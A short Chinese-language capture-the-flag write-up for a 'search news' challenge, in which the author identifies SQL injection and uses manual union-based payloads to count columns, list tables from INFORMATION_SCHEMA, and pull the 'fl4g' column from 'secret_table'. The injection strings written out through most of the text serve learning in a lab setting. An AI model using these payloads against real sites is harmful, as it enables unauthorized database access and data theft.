题目:
WP:
打开场景看到 search news的字样,只能输入进行操作
预测是一道SQL注入的题目
本题最直接的方法是sqlmap爆一下数据库
然而我对sqlmap的使用并不擅长
大家可以去看看这位大佬yangker12148的WP
我这里用的是简单的手动输入(原因很简单,近期在学数据库sql,就现学现用了)
输入 ' and 0 union select 1#
进行字段长度的推测
' and 0 union select 1,2#
' and 0 union select 1,2,3 #
下面用
' and 0 union
select 1,TABLE_SCHEMA,TABLE_NAME
from INFORMATION_SCHEMA.COLUMNS #
查询库中所有表
secret_table?答案不在这还能在哪?
使用
' and 0 union select 1,column_name,data_type from
information_schema.columns
where table_name='secret_table'#
一个熟悉的身影:fl4g
直接查询
' and 0 union select 1,2,fl4g from secret_table #
成功